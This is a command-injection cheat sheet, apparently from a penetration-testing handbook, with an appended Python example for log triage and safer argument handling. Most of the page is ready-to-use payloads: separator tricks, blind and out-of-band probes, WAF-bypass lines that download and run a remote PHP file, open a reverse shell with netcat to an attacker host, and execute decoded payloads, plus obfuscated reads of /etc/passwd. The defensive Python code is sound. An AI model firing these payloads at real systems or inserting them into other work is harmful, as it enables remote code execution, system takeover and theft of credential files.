Pentest Book
Command Injection
Command injection is an attack whose goal is the execution of arbitrary commands on the host operating system through a vulnerable application.
# For detection, try to concatenate another command to the param value
&
;
Newline (0x0a or \n)
&&
|
||
# like: https://target.com/whatever?param=1|whoami

# Blind (Time delay)
https://target.com/whatever?param=x||ping+-c+10+127.0.0.1||

# Blind (Redirect)
https://target.com/whatever?param=x||whoami>/var/www/images/output.txt||

# Blind (OOB)
https://target.com/whatever?param=x||nslookup+burp.collaborator.address||
https://target.com/whatever?param=x||nslookup+`whoami`.burp.collaborator.address||

# Common params:
cmd
exec
command
execute
ping
query
jump
code
reg
do
func
arg
option
load
process
step
read
function
req
feature
exe
module
payload
run
print

# Useful Commands: Linux
whoami
ifconfig
ls
uname -a

# Useful Commands: Windows
whoami
ipconfig
dir
ver

# Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id
ls|id; ls |id; ls| id; ls | id
ls&&id; ls &&id; ls&& id; ls && id
ls&id; ls &id; ls& id; ls & id
ls %0A id

# Time Delay Commands
& ping -c 10 127.0.0.1 &

# Redirecting output
& whoami > /var/www/images/output.txt &

# OOB (Out Of Band) Exploitation
& nslookup attacker-server.com &
& nslookup `whoami`.attacker-server.com &

# WAF bypasses
vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload

# Some filter bypasses (quoting, globbing and empty expansions that still resolve to /etc/passwd)
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's'swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et''c/passw''d
cat /et$()c/pa$()sswd
{cat,/etc/passwd}
cat /???/?????d
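As an added illustration, not code from the Pentest Book, the separator list above turned into a defender's log-triage check, placed beside the kind of shell-string builder that makes these payloads work and its allow-listed replacement. The access-log lines and the `.oob.invalid` domain are constructed for the demo.

```python
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit
# Separators the cheat sheet lists (&, ;, newline, &&, |, ||) plus the
# command-substitution forms used in its OOB payloads (`...` and $(...)).
MARKERS = re.compile(r"\|\||&&|\$\(|[|&;\n`]")

# Constructed access-log lines (not real traffic); the payloads mirror the
# cheat sheet's detection and blind examples, with a reserved ".invalid" domain.
SAMPLE_LOG = """\
GET /whatever?param=1 HTTP/1.1
GET /whatever?param=1|whoami HTTP/1.1
GET /whatever?param=x||ping+-c+10+127.0.0.1|| HTTP/1.1
GET /whatever?param=127.0.0.1%0awhoami HTTP/1.1
GET /whatever?param=x||nslookup+`whoami`.oob.invalid|| HTTP/1.1
"""

def injection_markers(raw_value: str) -> list:
    """Separator tokens in a raw query value after URL decoding (%0a, +, ...)."""
    return MARKERS.findall(unquote_plus(raw_value))

def triage_log(log_text: str) -> list:
    """(path, param, markers) for every query parameter that carries a marker."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        url = urlsplit(parts[1])
        # Split on '&' before decoding, which is how the server's parser sees it.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            found = injection_markers(raw)
            if found:
                hits.append((url.path, name, found))
    return hits

def ping_command_vulnerable(host: str) -> str:
    # 'Before' form: the value is pasted into a shell string, so any marker
    # above ends the ping and starts a second command. Built here, never run.
    return f"ping -c 1 {host}"

def ping_command_hardened(host: str):
    """Allow-list the value as an IP literal and return argv for
    subprocess.run(argv) with no shell; None means reject and log the request."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return None
    return ["ping", "-c", "1", host]
```

A bare `&` or `;` also appears in innocuous input, so treat a hit as a lead to review rather than a verdict.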